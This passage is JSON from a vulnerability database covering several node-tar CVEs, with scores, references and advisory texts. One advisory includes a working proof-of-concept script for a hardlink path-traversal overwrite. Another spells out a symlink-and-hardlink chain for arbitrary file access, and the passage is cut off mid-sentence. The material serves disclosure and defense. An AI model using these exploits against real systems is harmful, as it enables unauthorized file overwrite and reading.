"HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/npm/node-tar/security/advisories/GHSA-qq89-hq3f-393p" }, { "reference_url": "https://security.gentoo.org/glsa/202405-29", "reference_id": "GLSA-202405-29", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202405-29" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:5086", "reference_id": "RHSA-2021:5086", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:5086" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2022:0041", "reference_id": "RHSA-2022:0041", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2022:0041" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2022:0246", "reference_id": "RHSA-2022:0246", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2022:0246" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2022:0350", "reference_id": "RHSA-2022:0350", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2022:0350" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2022:4914", "reference_id": "RHSA-2022:4914", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2022:4914" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/39221?format=api", "purl": "pkg:npm/tar@6.1.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5wr3-7131-u3aa" }, { "vulnerability": "VCID-bj4b-gq5e-2kfy" }, { "vulnerability": "VCID-fqmy-jhdk-xfhw" }, { "vulnerability": "VCID-jj22-rfbv-bkg3" }, { "vulnerability": "VCID-qunt-xms1-a3cc" }, { "vulnerability": "VCID-xqpk-t1d2-yqak" }, { "vulnerability": "VCID-yy79-dbn9-7bd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/tar@6.1.9" } ], "aliases": [ "CVE-2021-37712", "GHSA-qq89-hq3f-393p" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7mtb-yaq7-77ep" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/24908?format=api", "vulnerability_id": "VCID-bj4b-gq5e-2kfy", "summary": "tar has Hardlink Path Traversal via Drive-Relative Linkpath\n### Summary\n`tar` (npm) can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as `C:../target.txt`, which enables file overwrite outside `cwd` during normal `tar.x()` extraction.\n\n### Details\nThe extraction logic in `Unpack[STRIPABSOLUTEPATH]` checks for `..` segments *before* stripping absolute roots.\n\nWhat happens with `linkpath: \"C:../target.txt\"`:\n1. Split on `/` gives `['C:..', 'target.txt']`, so `parts.includes('..')` is false.\n2. `stripAbsolutePath()` removes `C:` and rewrites the value to `../target.txt`.\n3. Hardlink creation resolves this against extraction `cwd` and escapes one directory up.\n4. Writing through the extracted hardlink overwrites the outside file.\n\nThis is reachable in standard usage (`tar.x({ cwd, file })`) when extracting attacker-controlled tar archives.\n\n### PoC\nTested on Arch Linux with `tar@7.5.9`.\n\nPoC script (`poc.cjs`):\n\n```js\nconst fs = require('fs')\nconst path = require('path')\nconst { Header, x } = require('tar')\n\nconst cwd = process.cwd()\nconst target = path.resolve(cwd, '..', 'target.txt')\nconst tarFile = path.join(process.cwd(), 'poc.tar')\n\nfs.writeFileSync(target, 'ORIGINAL\\n')\n\nconst b = Buffer.alloc(1536)\nnew Header({ path: 'l', type: 'Link', linkpath: 'C:../target.txt' }).encode(b, 0)\nfs.writeFileSync(tarFile, b)\n\nx({ cwd, file: tarFile }).then(() => {\n fs.writeFileSync(path.join(cwd, 'l'), 'PWNED\\n')\n process.stdout.write(fs.readFileSync(target, 'utf8'))\n})\n```\n\nRun:\n\n```bash\ncd test-workspace\nnode poc.cjs && ls -l ../target.txt\n```\n\nObserved output:\n\n```text\nPWNED\n-rw-r--r-- 2 joshuavr joshuavr 6 Mar 4 19:25 ../target.txt\n```\n\n`PWNED` confirms outside file content overwrite. Link count `2` confirms the extracted file and `../target.txt` are hardlinked.\n\n### Impact\nThis is an arbitrary file overwrite primitive outside the intended extraction root, with the permissions of the process performing extraction.\n\nRealistic scenarios:\n- CLI tools unpacking untrusted tarballs into a working directory\n- build/update pipelines consuming third-party archives\n- services that import user-supplied tar files", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-29786.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-29786.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-29786", "reference_id": "", "reference_type": "", "scores": [ { "value": "5e-05", "scoring_system": "epss", "scoring_elements": "0.00269", "published_at": "2026-04-16T12:55:00Z" }, { "value": "5e-05", "scoring_system": "epss", "scoring_elements": "0.00271", "published_at": "2026-04-13T12:55:00Z" }, { "value": "5e-05", "scoring_system": "epss", "scoring_elements": "0.00272", "published_at": "2026-04-12T12:55:00Z" }, { "value": "5e-05", "scoring_system": "epss", "scoring_elements": "0.00275", "published_at": "2026-04-11T12:55:00Z" }, { "value": "5e-05", "scoring_system": "epss", "scoring_elements": "0.00276", "published_at": "2026-04-09T12:55:00Z" }, { "value": "5e-05", "scoring_system": "epss", "scoring_elements": "0.00277", "published_at": "2026-04-08T12:55:00Z" }, { "value": "5e-05", "scoring_system": "epss", "scoring_elements": "0.00243", "published_at": "2026-04-07T12:55:00Z" }, { "value": "5e-05", "scoring_system": "epss", "scoring_elements": "0.00245", "published_at": "2026-04-02T12:55:00Z" }, { "value": "5e-05", "scoring_system": "epss", "scoring_elements": "0.00246", "published_at": "2026-04-04T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00586", "published_at": "2026-04-18T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-29786" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-29786", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-29786" }, { "reference_url": "https://github.com/isaacs/node-tar", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/isaacs/node-tar" }, { "reference_url": "https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-09T17:52:29Z/" } ], "url": "https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f" }, { "reference_url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-09T17:52:29Z/" } ], "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29786", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29786" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445476", "reference_id": "2445476", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445476" }, { "reference_url": "https://github.com/advisories/GHSA-qffp-2rhf-9h96", "reference_id": "GHSA-qffp-2rhf-9h96", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qffp-2rhf-9h96" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/68098?format=api", "purl": "pkg:npm/tar@7.5.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-qunt-xms1-a3cc" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/tar@7.5.10" } ], "aliases": [ "CVE-2026-29786", "GHSA-qffp-2rhf-9h96" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bj4b-gq5e-2kfy" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/16647?format=api", "vulnerability_id": "VCID-fqmy-jhdk-xfhw", "summary": "Denial of service while parsing a tar file due to lack of folders count validation\n## Description: \nDuring some analysis today on npm's `node-tar` package I came across the folder creation process, Basicly if you provide node-tar with a path like this `./a/b/c/foo.txt` it would create every folder and sub-folder here a, b and c until it reaches the last folder to create `foo.txt`, In-this case I noticed that there's no validation at all on the amount of folders being created, that said we're actually able to CPU and memory consume the system running node-tar and even crash the nodejs client within few seconds of running it using a path with too many sub-folders inside\n\n## Steps To Reproduce:\nYou can reproduce this issue by downloading the tar file I provided in the resources and using node-tar to extract it, you should get the same behavior as the video\n\n## Proof Of Concept:\nHere's a [video](https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/3i7uojw8s52psar6pg8zkdo4h9io?response-content-disposition=attachment%3B%20filename%3D%22tar-dos-poc.webm%22%3B%20filename%2A%3DUTF-8%27%27tar-dos-poc.webm&response-content-type=video%2Fwebm&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQSWWGDXHA%2F20240312%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20240312T080103Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEDcaCXVzLXdlc3QtMiJHMEUCID3xYDc6emXVPOg8iVR5dVk0u3gguTPIDJ0OIE%2BKxj17AiEAi%2BGiay1gGMWhH%2F031fvMYnSsa8U7CnpZpxvFAYqNRwgqsQUIQBADGgwwMTM2MTkyNzQ4NDkiDAaj6OgUL3gg4hhLLCqOBUUrOgWSqaK%2FmxN6nKRvB4Who3LIyzswFKm9LV94GiSVFP3zXYA480voCmAHTg7eBL7%2BrYgV2RtXbhF4aCFMCN3qu7GeXkIdH7xwVMi9zXHkekviSKZ%2FsZtVVjn7RFqOCKhJl%2FCoiLQJuDuju%2FtfdTGZbEbGsPgKHoILYbRp81K51zeRL21okjsOehmypkZzq%2BoGrXIX0ynPOKujxw27uqdF4T%2BF9ynodq01vGgwgVBEjHojc4OKOfr1oW5b%2FtGVV59%2BOBVI1hqIKHRG0Ed4SWmp%2BLd1hazGuZPvp52szmegnOj5qr3ubppnKL242bX%2FuAnQKzKK0HpwolqXjsuEeFeM85lxhqHV%2B1BJqaqSHHDa0HUMLZistMRshRlntuchcFQCR6HBa2c8PSnhpVC31zMzvYMfKsI12h4HB6l%2FudrmNrvmH4LmNpi4dZFcio21DzKj%2FRjWmxjH7l8egDyG%2FIgPMY6Ls4IiN7aR1jijYTrBCgPUUHets3BFvqLzHtPFnG3B7%2FYRPnhCLu%2FgzvKN3F8l38KqeTNMHJaxkuhCvEjpFB2SJbi2QZqZZbLj3xASqXoogzbsyPp0Tzp0tH7EKDhPA7H6wwiZukXfFhhlYzP8on9fO2Ajz%2F%2BTDkDjbfWw4KNJ0cFeDsGrUspqQZb5TAKlUge7iOZEc2TZ5uagatSy9Mg08E4nImBSE5QUHDc7Daya1gyqrETMDZBBUHH2RFkGA9qMpEtNrtJ9G%2BPedz%2FpPY1hh9OCp9Pg1BrX97l3SfVzlAMRfNibhywq6qnE35rVnZi%2BEQ1UgBjs9jD%2FQrW49%2FaD0oUDojVeuFFryzRnQxDbKtYgonRcItTvLT5Y0xaK9P0u6H1197%2FMk3XxmjD9%2Fb%2BvBjqxAQWWkKiIxpC1oHEWK9Jt8UdJ39xszDBGpBqjB6Tvt5ePAXSyX8np%2FrBi%2BAPx06O0%2Ba7pU4NmH800EVXxxhgfj9nMw3CeoUIdxorVKtU2Mxw%2FLaAiPgxPS4rqkt65NF7eQYfegcSYDTm2Z%2BHPbz9HfCaVZ28Zqeko6sR%2F29ML4bguqVvHAM4mWPLNDXH33mjG%2BuzLi8e1BF7tNveg2X9G%2FRdcMkojwKYbu6xN3M6aX2alQg%3D%3D&X-Amz-SignedHeaders=host&X-Amz-Signature=1e8235d885f1d61529b7d6b23ea3a0780c300c91d86e925dd8310d5b661ddbe2) show-casing the exploit: \n\n## Impact\n\nDenial of service by crashing the nodejs client when attempting to parse a tar archive, make it run out of heap memory and consuming server CPU and memory resources\n\n## Report resources\n[payload.txt](https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/1e83ayb5dd3350fvj3gst0mqixwk?response-content-disposition=attachment%3B%20filename%3D%22payload.txt%22%3B%20filename%2A%3DUTF-8%27%27payload.txt&response-content-type=text%2Fplain&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQSWWGDXHA%2F20240312%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20240312T080103Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEDcaCXVzLXdlc3QtMiJHMEUCID3xYDc6emXVPOg8iVR5dVk0u3gguTPIDJ0OIE%2BKxj17AiEAi%2BGiay1gGMWhH%2F031fvMYnSsa8U7CnpZpxvFAYqNRwgqsQUIQBADGgwwMTM2MTkyNzQ4NDkiDAaj6OgUL3gg4hhLLCqOBUUrOgWSqaK%2FmxN6nKRvB4Who3LIyzswFKm9LV94GiSVFP3zXYA480voCmAHTg7eBL7%2BrYgV2RtXbhF4aCFMCN3qu7GeXkIdH7xwVMi9zXHkekviSKZ%2FsZtVVjn7RFqOCKhJl%2FCoiLQJuDuju%2FtfdTGZbEbGsPgKHoILYbRp81K51zeRL21okjsOehmypkZzq%2BoGrXIX0ynPOKujxw27uqdF4T%2BF9ynodq01vGgwgVBEjHojc4OKOfr1oW5b%2FtGVV59%2BOBVI1hqIKHRG0Ed4SWmp%2BLd1hazGuZPvp52szmegnOj5qr3ubppnKL242bX%2FuAnQKzKK0HpwolqXjsuEeFeM85lxhqHV%2B1BJqaqSHHDa0HUMLZistMRshRlntuchcFQCR6HBa2c8PSnhpVC31zMzvYMfKsI12h4HB6l%2FudrmNrvmH4LmNpi4dZFcio21DzKj%2FRjWmxjH7l8egDyG%2FIgPMY6Ls4IiN7aR1jijYTrBCgPUUHets3BFvqLzHtPFnG3B7%2FYRPnhCLu%2FgzvKN3F8l38KqeTNMHJaxkuhCvEjpFB2SJbi2QZqZZbLj3xASqXoogzbsyPp0Tzp0tH7EKDhPA7H6wwiZukXfFhhlYzP8on9fO2Ajz%2F%2BTDkDjbfWw4KNJ0cFeDsGrUspqQZb5TAKlUge7iOZEc2TZ5uagatSy9Mg08E4nImBSE5QUHDc7Daya1gyqrETMDZBBUHH2RFkGA9qMpEtNrtJ9G%2BPedz%2FpPY1hh9OCp9Pg1BrX97l3SfVzlAMRfNibhywq6qnE35rVnZi%2BEQ1UgBjs9jD%2FQrW49%2FaD0oUDojVeuFFryzRnQxDbKtYgonRcItTvLT5Y0xaK9P0u6H1197%2FMk3XxmjD9%2Fb%2BvBjqxAQWWkKiIxpC1oHEWK9Jt8UdJ39xszDBGpBqjB6Tvt5ePAXSyX8np%2FrBi%2BAPx06O0%2Ba7pU4NmH800EVXxxhgfj9nMw3CeoUIdxorVKtU2Mxw%2FLaAiPgxPS4rqkt65NF7eQYfegcSYDTm2Z%2BHPbz9HfCaVZ28Zqeko6sR%2F29ML4bguqVvHAM4mWPLNDXH33mjG%2BuzLi8e1BF7tNveg2X9G%2FRdcMkojwKYbu6xN3M6aX2alQg%3D%3D&X-Amz-SignedHeaders=host&X-Amz-Signature=bad9fe731f05a63a950f99828125653a8c1254750fe0ca7be882e89ecdd449ae)\n[archeive.tar.gz](https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/ymkuh4xnfdcf1soeyi7jc2x4yt2i?response-content-disposition=attachment%3B%20filename%3D%22archive.tar.gz%22%3B%20filename%2A%3DUTF-8%27%27archive.tar.gz&response-content-type=application%2Fx-tar&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQSWWGDXHA%2F20240312%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20240312T080103Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEDcaCXVzLXdlc3QtMiJHMEUCID3xYDc6emXVPOg8iVR5dVk0u3gguTPIDJ0OIE%2BKxj17AiEAi%2BGiay1gGMWhH%2F031fvMYnSsa8U7CnpZpxvFAYqNRwgqsQUIQBADGgwwMTM2MTkyNzQ4NDkiDAaj6OgUL3gg4hhLLCqOBUUrOgWSqaK%2FmxN6nKRvB4Who3LIyzswFKm9LV94GiSVFP3zXYA480voCmAHTg7eBL7%2BrYgV2RtXbhF4aCFMCN3qu7GeXkIdH7xwVMi9zXHkekviSKZ%2FsZtVVjn7RFqOCKhJl%2FCoiLQJuDuju%2FtfdTGZbEbGsPgKHoILYbRp81K51zeRL21okjsOehmypkZzq%2BoGrXIX0ynPOKujxw27uqdF4T%2BF9ynodq01vGgwgVBEjHojc4OKOfr1oW5b%2FtGVV59%2BOBVI1hqIKHRG0Ed4SWmp%2BLd1hazGuZPvp52szmegnOj5qr3ubppnKL242bX%2FuAnQKzKK0HpwolqXjsuEeFeM85lxhqHV%2B1BJqaqSHHDa0HUMLZistMRshRlntuchcFQCR6HBa2c8PSnhpVC31zMzvYMfKsI12h4HB6l%2FudrmNrvmH4LmNpi4dZFcio21DzKj%2FRjWmxjH7l8egDyG%2FIgPMY6Ls4IiN7aR1jijYTrBCgPUUHets3BFvqLzHtPFnG3B7%2FYRPnhCLu%2FgzvKN3F8l38KqeTNMHJaxkuhCvEjpFB2SJbi2QZqZZbLj3xASqXoogzbsyPp0Tzp0tH7EKDhPA7H6wwiZukXfFhhlYzP8on9fO2Ajz%2F%2BTDkDjbfWw4KNJ0cFeDsGrUspqQZb5TAKlUge7iOZEc2TZ5uagatSy9Mg08E4nImBSE5QUHDc7Daya1gyqrETMDZBBUHH2RFkGA9qMpEtNrtJ9G%2BPedz%2FpPY1hh9OCp9Pg1BrX97l3SfVzlAMRfNibhywq6qnE35rVnZi%2BEQ1UgBjs9jD%2FQrW49%2FaD0oUDojVeuFFryzRnQxDbKtYgonRcItTvLT5Y0xaK9P0u6H1197%2FMk3XxmjD9%2Fb%2BvBjqxAQWWkKiIxpC1oHEWK9Jt8UdJ39xszDBGpBqjB6Tvt5ePAXSyX8np%2FrBi%2BAPx06O0%2Ba7pU4NmH800EVXxxhgfj9nMw3CeoUIdxorVKtU2Mxw%2FLaAiPgxPS4rqkt65NF7eQYfegcSYDTm2Z%2BHPbz9HfCaVZ28Zqeko6sR%2F29ML4bguqVvHAM4mWPLNDXH33mjG%2BuzLi8e1BF7tNveg2X9G%2FRdcMkojwKYbu6xN3M6aX2alQg%3D%3D&X-Amz-SignedHeaders=host&X-Amz-Signature=5e2c0d4b4de40373ac0fe91908c2659141a6dd4ab850271cc26042a3885c82ea)\n\n## Note\nThis report was originally reported to GitHub bug bounty program, they asked me to report it to you a month ago", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-28863.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-28863.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28863", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00479", "scoring_system": "epss", "scoring_elements": "0.64998", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00479", "scoring_system": "epss", "scoring_elements": "0.65037", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00479", "scoring_system": "epss", "scoring_elements": "0.64988", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00479", "scoring_system": "epss", "scoring_elements": "0.65025", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00648", "scoring_system": "epss", "scoring_elements": "0.70787", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00648", "scoring_system": "epss", "scoring_elements": "0.70838", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00648", "scoring_system": "epss", "scoring_elements": "0.70796", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00648", "scoring_system": "epss", "scoring_elements": "0.70832", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00648", "scoring_system": "epss", "scoring_elements": "0.70802", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00648", "scoring_system": "epss", "scoring_elements": "0.70818", "published_at": "2026-04-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28863" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28863", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28863" }, { "reference_url": "https://github.com/isaacs/node-tar", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/isaacs/node-tar" }, { "reference_url": "https://github.com/isaacs/node-tar/commit/fe8cd57da5686f8695415414bda49206a545f7f7", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-22T14:55:49Z/" } ], "url": "https://github.com/isaacs/node-tar/commit/fe8cd57da5686f8695415414bda49206a545f7f7" }, { "reference_url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-f5x3-32g6-xq36", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-22T14:55:49Z/" } ], "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-f5x3-32g6-xq36" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28863", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28863" }, { "reference_url": "https://security.netapp.com/advisory/ntap-20240524-0005", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://security.netapp.com/advisory/ntap-20240524-0005" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2293200", "reference_id": "2293200", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2293200" }, { "reference_url": "https://github.com/advisories/GHSA-f5x3-32g6-xq36", "reference_id": "GHSA-f5x3-32g6-xq36", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-f5x3-32g6-xq36" }, { "reference_url": "https://security.netapp.com/advisory/ntap-20240524-0005/", "reference_id": "ntap-20240524-0005", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-22T14:55:49Z/" } ], "url": "https://security.netapp.com/advisory/ntap-20240524-0005/" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:5814", "reference_id": "RHSA-2024:5814", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:5814" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:6147", "reference_id": "RHSA-2024:6147", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:6147" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:6148", "reference_id": "RHSA-2024:6148", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:6148" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:6755", "reference_id": "RHSA-2024:6755", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:6755" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/56158?format=api", "purl": "pkg:npm/tar@6.2.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5wr3-7131-u3aa" }, { "vulnerability": "VCID-bj4b-gq5e-2kfy" }, { "vulnerability": "VCID-jj22-rfbv-bkg3" }, { "vulnerability": "VCID-qunt-xms1-a3cc" }, { "vulnerability": "VCID-xqpk-t1d2-yqak" }, { "vulnerability": "VCID-yy79-dbn9-7bd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/tar@6.2.1" } ], "aliases": [ "CVE-2024-28863", "GHSA-f5x3-32g6-xq36" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fqmy-jhdk-xfhw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/20889?format=api", "vulnerability_id": "VCID-jj22-rfbv-bkg3", "summary": "Arbitrary File Read/Write via Hardlink Target Escape Through Symlink Chain in node-tar Extraction\n### Summary\n`tar.extract()` in Node `tar` allows an attacker-controlled archive to create a hardlink inside the extraction directory that points to a file outside the extraction root, using default options.\n\nThis enables **arbitrary file read and write** as the extracting user (no root, no chmod, no `preservePaths`).\n\nSeverity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive.\n\n### Details\nThe bypass chain uses two symlinks plus one hardlink:\n\n1. `a/b/c/up -> ../..`\n2. `a/b/escape -> c/up/../..`\n3. `exfil` (hardlink) -> `a/b/escape/<target-relative-to-parent-of-extract>`\n\nWhy this works:\n\n- Linkpath checks are string-based and do not resolve symlinks on disk for hardlink target safety.\n - See `STRIPABSOLUTEPATH` logic in:\n - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:255`\n - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:268`\n - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:281`\n\n- Hardlink extraction resolves target as `path.resolve(cwd, entry.linkpath)` and then calls `fs.link(target, destination)`.\n - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:566`\n - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:567`\n - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:703`\n\n- Parent directory safety checks (`mkdir` + symlink detection) are applied to the destination path of the extracted entry, not to the resolved hardlink target path.\n - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:617`\n - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:619`\n - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/mkdir.js:27`\n - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/mkdir.js:101`\n\nAs a result, `exfil` is created inside 